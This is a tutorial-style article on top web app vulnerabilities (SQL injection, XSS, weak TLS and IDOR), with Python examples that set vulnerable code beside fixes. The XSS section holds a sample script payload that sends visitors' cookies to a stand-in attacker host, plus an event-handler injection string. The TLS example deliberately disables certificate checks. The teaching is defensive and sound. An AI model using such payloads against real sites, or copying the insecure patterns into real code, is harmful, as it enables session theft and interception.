Hack app: top vulnerabilities in web apps

Dec 28


Ivanka Kartata



Attackers can get into a database and steal clients' personal information. With a security strategy and knowledge of the most vulnerable spots in a system, you can prevent data breaches.


A web app is a great tool for interaction between clients and a company's product. But because web apps store and process a lot of sensitive and private client information, they are frequently in attackers' sights.

The Open Web Application Security Project (OWASP), a community whose primary goal is to improve web application security, publishes recommendations for minimizing these risks.

According to OWASP, the following are the main vulnerabilities in web apps that cybercriminals can exploit.

SQL injection

SQL is a query language used to read, change, and delete data in databases. According to the Edgescan 2020 Vulnerability Stats Report, 42% of the web app vulnerabilities found were SQL injections. It is one of the most common attacks because it is easy to perform, and the danger is magnified because a large part of the web is backed by SQL databases.

SQL injection is a technique that lets an attacker reach the database by injecting malicious SQL statements through a vulnerable application. Attackers place SQL fragments in input fields (login, password, email) to get into a user's or administrator's account and manipulate the system. They can transfer money from a client's account to their own, steal private data, and change or delete it. At worst, such an attack gives access to all data on the database server.

Fortunately, there are well-known techniques to prevent SQL injection and minimize the risk.

  • use parameterized queries (prepared statements) so that user input is passed as data and is never parsed as part of the SQL statement;
  • validate input against an allow-list of expected characters and formats rather than trying to ban "dangerous" characters, which is easy to bypass;
  • use a web application firewall to identify and block known malicious request patterns, as a second layer rather than a replacement for fixing the code;
  • turn off unnecessary database functions and run the application with a least-privilege database account, because every extra privilege is a potential loophole for attackers.

Cross-site scripting (XSS)

Sites such as MySpace, Facebook, Barack Obama's election campaign website, eBay, and even the FBI have been hit by XSS attacks.

Cross-site scripting is a vulnerability in dynamic web pages and web apps. An attacker injects a malicious script into a page so that it runs in the browser of anyone who visits it; simply loading the page is enough to become a victim. Once the script runs, the attacker can change or control the content of the page, for example redirecting users to other malicious sites, and can read the user's cookies for that site. With stolen cookies, they can impersonate the user and steal private data.

JavaScript is the main language for XSS attacks, but they are also possible with VBScript, ActiveX, Flash, and even CSS. XSS becomes possible whenever a web app includes user input in a page in such a way that a string can be interpreted as code.

Prevention:

  • validate input so that users can only submit the kind of data you expect, and encode output so that untrusted data is never interpreted as active content;
  • use the encoding that matches the part of the HTML document you are putting untrusted data into (element body, attribute, JavaScript, URL), since each context has different special characters;
  • do not insert data that came from the client directly into your HTML, because it can be used for malicious activity;
  • treat all data from users as untrusted: validate it on the way in and encode it on the way out.
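The following added example (not code from the article) shows the two halves of that advice in Python: an allow-list check on the way in, and context-specific output encoding on the way out for the two most common HTML contexts, element body and attribute value. The attacker payloads, the `evil.example` host and the page fragments are constructed for the demonstration.

```python
import html
import re

# Constructed attacker payload: a "comment" that tries to ship the visitor's
# cookies to a host the attacker controls.
PAYLOAD = (
    "<script>new Image().src='https://evil.example/?c='"
    "+document.cookie</script>"
)


def render_comment_unsafe(comment: str) -> str:
    """Puts untrusted text straight into the element body: the payload runs."""
    return f'<div class="comment">{comment}</div>'


def render_comment_safe(comment: str) -> str:
    """Element-body context: escape &, <, >, " and ' so the browser displays
    the text instead of parsing it as markup."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


def render_search_box_unsafe(value: str) -> str:
    """Attribute context without escaping: a value such as
    '" onfocus="alert(1)" autofocus="' closes the attribute and adds an
    event handler that fires without any click."""
    return f'<input type="text" name="q" value="{value}">'


def render_search_box(value: str) -> str:
    """Attribute context: the value must be quoted AND quote characters
    escaped (html.escape with quote=True does both " and ')."""
    return f'<input type="text" name="q" value="{html.escape(value, quote=True)}">'


USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{3,32}")


def valid_username(name: str) -> bool:
    """Input validation against an allow-list of expected characters, applied
    on the way in; output encoding is still required on the way out."""
    return USERNAME_RE.fullmatch(name) is not None


def has_active_content(markup: str) -> bool:
    """Rough check used only by this demo: does the markup still contain a
    script tag or an unescaped event-handler attribute?"""
    return bool(re.search(r'<script|\son\w+="', markup, re.IGNORECASE))


if __name__ == "__main__":
    print(render_comment_unsafe(PAYLOAD))
    print(render_comment_safe(PAYLOAD))
    attr_payload = '" onfocus="alert(1)" autofocus="'
    print(render_search_box_unsafe(attr_payload))
    print(render_search_box(attr_payload))
```

Real applications should leave this to a templating engine that escapes by default (Jinja2 with autoescape, React's JSX, etc.) and add a Content-Security-Policy header as a second layer; `html.escape` is not sufficient for data placed inside a `<script>` block or a URL, which need their own encoders.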


Insufficient Transport Layer Protection

This vulnerability is caused by missing or misconfigured transport encryption, or by expired security certificates.

Web apps exchange data between the user and the server. When a user enters data, the app sends it to the server to be authenticated, and uses a security protocol (SSL/TLS) to protect it in transit. But if some part of the app does not use TLS, uses it incorrectly (for example, obsolete protocol versions or no certificate validation), or uses an expired certificate, the data is exposed.

This can lead to a data breach, because an attacker on the network path can intercept private information.
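As an added example (not code from the article), here is how the client side of that mistake looks in Python's standard `ssl` module, beside the corrected configuration, plus a check for the expired-certificate case that the article mentions. The certificate fields are constructed for the example and the `app.example` host name is made up; the expiry check works on the dictionary format that `SSLSocket.getpeercert()` returns, so it can be applied to a live connection unchanged.

```python
import ssl
import time
from typing import Optional


def weak_client_context() -> ssl.SSLContext:
    """The misconfiguration described above: the connection is encrypted, but
    the server's certificate is never verified, so anyone on the path can
    present their own certificate and read the traffic."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False       # must be disabled before CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_client_context() -> ssl.SSLContext:
    """Verify the chain against the system trust store, check that the
    certificate matches the host name, and refuse anything older than
    TLS 1.2."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def cert_is_expired(cert: dict, now: Optional[float] = None) -> bool:
    """`cert` is in the dict format returned by SSLSocket.getpeercert().
    Returns True when the certificate's notAfter is in the past; `now` is
    seconds since the epoch and defaults to the current time."""
    not_after = ssl.cert_time_to_seconds(cert["notAfter"])
    current = time.time() if now is None else now
    return current > not_after


# Constructed certificate fields for the example (not a real certificate).
SAMPLE_CERT = {
    "subject": ((("commonName", "app.example"),),),
    "notBefore": "Jan 15 00:00:00 2019 GMT",
    "notAfter": "Jan 15 00:00:00 2020 GMT",
}

# Server-side companion: tell browsers to refuse plain HTTP for a year.
HSTS_HEADER = ("Strict-Transport-Security", "max-age=31536000; includeSubDomains")


if __name__ == "__main__":
    ctx = hardened_client_context()
    print("verify_mode:", ctx.verify_mode, "check_hostname:", ctx.check_hostname)
    print("sample cert expired:", cert_is_expired(SAMPLE_CERT))
```

The same two settings (certificate verification and a TLS 1.2 floor) are the ones to look for in any HTTP client library configuration; a `verify=False` or equivalent flag left over from development is the most common way this vulnerability reaches production.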


Insecure direct object references (IDOR)

Insecure direct object references (IDOR) is a failure of access control: the web app lets a user reach an object directly through a value they supply. Attackers modify a parameter in the URL, for example an ID value that refers to a user account. If the web app has an IDOR vulnerability, the attacker gets access to another account without authorization. Predictable IDs make this worse: a low number such as 1 is often the administrator's account.

The solution is to test access control strictly and to verify authorization for every referenced object on the server side, rather than relying on the client; using indirect or unpredictable references instead of sequential IDs adds a further layer.
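The following added example (not code from the article) models the `/account/<id>` endpoint described above as plain Python functions returning an HTTP status and body. The account table, user names and balances are constructed for the demonstration. The vulnerable handler authenticates the caller but trusts the ID from the URL; the safe handler checks ownership and returns the same 403 for "not yours" and "does not exist" so the endpoint cannot be used to enumerate accounts. The last two functions go one step further than the article's text and show indirect references: per-session random tokens that stand in for the real IDs.

```python
import secrets
from dataclasses import dataclass
from typing import Dict, Tuple


@dataclass
class Account:
    id: int
    owner: str
    balance: int


# Constructed sample data. Note the predictable sequential ids, with the
# administrator at id 1.
ACCOUNTS: Dict[int, Account] = {
    1: Account(1, "admin", 1_000_000),
    2: Account(2, "alice", 500),
    3: Account(3, "bob", 120),
}

Response = Tuple[int, dict]


def _serialize(acct: Account) -> dict:
    return {"id": acct.id, "owner": acct.owner, "balance": acct.balance}


def get_account_vulnerable(current_user: str, account_id: int) -> Response:
    """GET /account/<id>: the caller is authenticated, but the id from the URL
    is looked up without checking who owns it (the IDOR bug)."""
    acct = ACCOUNTS.get(account_id)
    if acct is None:
        return 404, {"error": "not found"}
    return 200, _serialize(acct)


def get_account_safe(current_user: str, account_id: int) -> Response:
    """Same endpoint with the missing authorization check. Missing and
    foreign accounts get an identical response."""
    acct = ACCOUNTS.get(account_id)
    if acct is None or acct.owner != current_user:
        return 403, {"error": "forbidden"}
    return 200, _serialize(acct)


def make_reference_map(current_user: str) -> Dict[str, int]:
    """Indirect references: random per-session tokens that map to the user's
    own account ids, so real ids never appear in URLs or forms."""
    return {
        secrets.token_urlsafe(16): acct.id
        for acct in ACCOUNTS.values()
        if acct.owner == current_user
    }


def resolve_reference(ref_map: Dict[str, int], ref: str, current_user: str) -> Response:
    """Look up the opaque token, then still enforce ownership server-side;
    the map is a convenience, not a substitute for the check."""
    account_id = ref_map.get(ref)
    if account_id is None:
        return 403, {"error": "forbidden"}
    return get_account_safe(current_user, account_id)


if __name__ == "__main__":
    # alice asks for account 1 (the administrator's) by editing the URL
    print("vulnerable:", get_account_vulnerable("alice", 1))
    print("safe      :", get_account_safe("alice", 1))
    refs = make_reference_map("alice")
    print("references:", refs)
```

In a real framework the ownership check belongs in one place (a model-level `can_access(user, obj)` helper or a policy layer) that every handler calls, so that a new endpoint cannot forget it; the test for IDOR is then simply to call each endpoint as one user with another user's identifiers.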